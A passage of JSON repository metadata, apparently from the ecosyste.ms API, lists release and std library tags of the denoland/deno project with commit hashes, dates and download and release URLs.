894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parse